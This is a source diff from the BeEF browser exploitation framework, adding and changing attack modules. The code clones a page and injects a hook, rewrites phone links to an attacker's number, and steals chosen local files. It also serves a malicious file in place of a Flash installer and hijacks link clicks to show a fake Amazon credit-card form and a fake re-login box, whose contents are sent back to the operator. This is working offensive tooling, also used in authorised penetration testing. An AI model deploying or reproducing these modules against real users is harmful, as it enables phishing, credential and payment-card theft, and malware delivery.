success = false
# Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
# there is no need to implement the complex logic to handle all different cases.
# We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
# So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
# 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
# - the user modify the example.com_mod file manually
# 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
#
if use_existing.nil? || use_existing == false
begin #,"--background"
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
end
c += 1
end
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
end
end
end
end
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
success
end
private
# Replace </head> with <BeEF_hook></head>
def add_beef_hook(line)
line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
line
end
private
# check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
def is_frameable(url)
result = true
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == "https"
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
frame_opt = response["X-Frame-Options"]
if frame_opt != nil
if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
result = false
end
end
print_info "Page can be framed: [#{result}]"
result
end
def get_page_content(file_path)
file = File.open(file_path,'r')
cloned_page = file.read
file.close
cloned_page
end
def persist_page(uri, mount)
webcloner_db = BeEF::Core::Models::Webcloner.new(
:uri => uri,
:mount => mount
)
webcloner_db.save
webcloner_db
end
end
end
end
end

24
modules/browser/hooked_domain/link_rewrite_tel/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var tel_number = "<%= @tel_number %>";
var selector = "a";
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
});

25
modules/browser/hooked_domain/link_rewrite_tel/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
link_rewrite_tel:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (TEL)"
description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
authors: ["bcoles"]
target:
working: ["ALL"]

28
modules/browser/hooked_domain/link_rewrite_tel/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Link_rewrite_tel < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

2
modules/exploits/local_host/java_payload/module.rb
View File

@@ -16,7 +16,7 @@
class Java_payload < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
end
def self.options

62
modules/misc/local_file_theft/command.js
View File

@@ -86,6 +86,16 @@ result = '';
}
}
fileList['custom']= {
// user defined
"discover" :'',
"post" :{
'result':'<%== @target_file %>',
}
}
functionList = {
mac:{
// OS X disovery
@@ -138,11 +148,25 @@ result = '';
grabFiles(homedir,"ios")
}
}
alert("ipad")
return true;
}
},
custom:{
// Grab custom stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['custom']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"custom")
}
}
return true;
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
@@ -172,19 +196,27 @@ result = '';
function identify(){
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
// custom file is specified
if ('<%== @target_file %>' != 'autodetect') {
return "custom"
// determine a good file to steal based on platform
} else {
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
}

10
modules/misc/local_file_theft/module.rb
View File

@@ -19,6 +19,16 @@
class Local_file_theft < BeEF::Core::Command
def self.options
return [
{'name' => 'target_file',
'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb',
'ui_label' => 'Target file',
'value' => 'autodetect'
}
]
end
def post_execute
content = {}
content['result'] = @datastore['result']

37
modules/phonegap/phonegap_check_connection/command.js Normal file
View File

@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
beef.execute(function() {
var connection_type;
getConnectionType = function() {
var states = {};
states[Connection.UNKNOWN] = 'Unknown connection';
states[Connection.ETHERNET] = 'Ethernet connection';
states[Connection.WIFI] = 'WiFi connection';
states[Connection.CELL_2G] = 'Cell 2G connection';
states[Connection.CELL_3G] = 'Cell 3G connection';
states[Connection.CELL_4G] = 'Cell 4G connection';
states[Connection.NONE] = 'No network connection';
return states[navigator.network.connection.type];
}
try {
connection_type = getConnectionType();
} catch(e) {
connection_type = "Unable to determine connection type."
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type);
});

27
modules/phonegap/phonegap_check_connection/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:
module:
phonegap_check_connection:
enable: true
category: "Phonegap"
name: "Check connection"
description: "Find out connection type e.g. Wifi, 3G.."
authors: ["mh"]
target:
working: ["All"]

27
modules/phonegap/phonegap_check_connection/module.rb Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
class Phonegap_check_connection < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

1
modules/phonegap/phonegap_detect/command.js
View File

@@ -23,6 +23,7 @@ beef.execute(function() {
phonegap_details = ""
+ " name: " + device.name
+ " phonegap api: " + device.phonegap
+ " cordova api: " + device.cordova
+ " platform: " + device.platform
+ " uuid: " + device.uuid
+ " version: " + device.version;

31
modules/phonegap/phonegap_persist_resume/command.js Normal file
View File

@@ -0,0 +1,31 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// persist on over app's sleep/wake events
beef.execute(function() {
var result;
try {
document.addEventListener("resume", beef_init(), false);
result = 'success';
} catch (e) {
for(var n in e) {
result+= n + " " + e[n] + "\n";
}
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

27
modules/phonegap/phonegap_persist_resume/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
beef:
module:
phonegap_persist_resume:
enable: true
category: "Phonegap"
name: "Persist resume"
description: "Persist over applications sleep/wake events"
authors: ["mh"]
target:
working: ["All"]

26
modules/phonegap/phonegap_persist_resume/module.rb Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
class Phonegap_persist_resume < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

37
modules/social_engineering/lcamtuf_download/command.js Normal file
View File

@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var maliciousurl = '<%= @malicious_file_uri %>';
var realurl = '<%= @real_file_uri %>';
var w;
var once = '<%= @do_once %>';
function doit() {
if (!beef.browser.isIE()) {
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo');
setTimeout(donext, 4500);
}
}
function donext() {
window.open(maliciousurl, 'foo');
if (once != true) setTimeout(donext, 5000);
once = true;
}
doit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});

26
modules/social_engineering/lcamtuf_download/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
lcamtuf_download:
enable: true
category: "Social Engineering"
name: "Lcamtuf Download"
description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative <i>Content-Disposition: attachment</i> header. For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
authors: ["Bart Leppens"]
target:
user_notify: ["ALL"]
not_working: ["IE"]

48
modules/social_engineering/lcamtuf_download/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Lcamtuf_download < BeEF::Core::Command
# set and return all options for this module
def self.options
return [{
'name' => 'real_file_uri',
'description' => 'The web accessible URI for the real file.',
'ui_label' => 'Real File Path',
'value' => 'http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869',
'width' => '300px'
},
{
'name' => 'malicious_file_uri',
'description' => 'The web accessible URI for the malicious file.',
'ui_label' => 'Malicious File Path',
'value' => '',
'width' => '300px'
},
{ 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore',
'store_fields' => ['do_once'], 'store_data' => [['false'],['true']],
'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true
}]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

43
modules/social_engineering/simple_hijacker/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
hijack = function(){
function send(answer){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
}
<% target = @targets.split(',') %>
$j('a').click(function(e) {
e.preventDefault();
if ($j(this).attr('href') != '')
{
if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
<%
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
file = File.open(tplpath, "r")
@template = file.read
%>
<%= @template %>
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
}
}
});
}
beef.execute(function() {
hijack();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
});

26
modules/social_engineering/simple_hijacker/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
simple_hijacker:
enable: true
category: "Social Engineering"
name: "Simple Hijacker"
description: "Hijack clicks on links to display what you want."
templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
authors: ["gallypette"]
target:
user_notify: ['ALL']

48
modules/social_engineering/simple_hijacker/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Simple_hijacker < BeEF::Core::Command
def self.options
config = BeEF::Core::Configuration.instance
@templates = config.get('beef.module.simple_hijacker.templates')
# Defines which domains to target
data = []
data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
# We'll then list all templates available
tmptpl = []
@templates.each{ |template|
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
tmptpl<<[ template]
}
data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
return data
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end
end

28
modules/social_engineering/simple_hijacker/templates/amazon.js Normal file
View File

@@ -0,0 +1,28 @@
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
collect = function(){
answer = "";
$j(":input").each(function() {
answer += " "+$j(this).attr("name")+":"+$j(this).val();
});
send(answer);
}
// floating div
function writediv() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('display', 'block');
sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
}
writediv();
$j("#confirm").click(function () {
$j('#hax').remove();
});

50
modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js Normal file
View File

File diff suppressed because one or more lines are too long

10
modules/social_engineering/simple_hijacker/templates/confirmbox.js Normal file
View File

@@ -0,0 +1,10 @@
var answer = confirm("Do you really want to leave us ??")
if (answer){
alert("Okay :(")
send("User chose to leave.");
window.location = $j(this).attr('href');
}
else{
alert("Okay enjoy ")
send("User chose to stay.");
}

105
modules/social_engineering/simple_hijacker/templates/credential.js Normal file
View File

@@ -0,0 +1,105 @@
imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
var answer= '';
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
// set up darkening
function grayOut(vis, options) {
// Pass true to gray out screen, false to ungray
// options are optional. This is a JSON object with the following (optional) properties
// opacity:0-100 // Lower number = less grayout higher = more of a blackout
// zindex: # // HTML elements with a higher zindex appear on top of the gray out
// bgcolor: (#xxxxxx) // Standard RGB Hex color code
// grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
// Because options is JSON opacity/zindex/bgcolor are all optional and can appear
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
}
// function to send response
function win(){
document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
}
// perform darkening
grayOut(true);
function checker(){
processval = document.body.lastChild.getElementsByTagName("input")[2].value;
if (processval == "Processing..") {
uname = document.body.lastChild.getElementsByTagName("input")[0].value;
pass = document.body.lastChild.getElementsByTagName("input")[1].value;
answer = uname+":"+pass
send(answer);
// set lastchild invisible
document.body.lastChild.setAttribute('style','display:none');
// lighten screen
grayOut(false);
clearInterval(credgrabber);
$j('#hax').remove();
$j('#darkenScreenObject').remove();
}
}
// floating div
function writeit() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
credgrabber = setInterval(checker,1000);
}
writeit();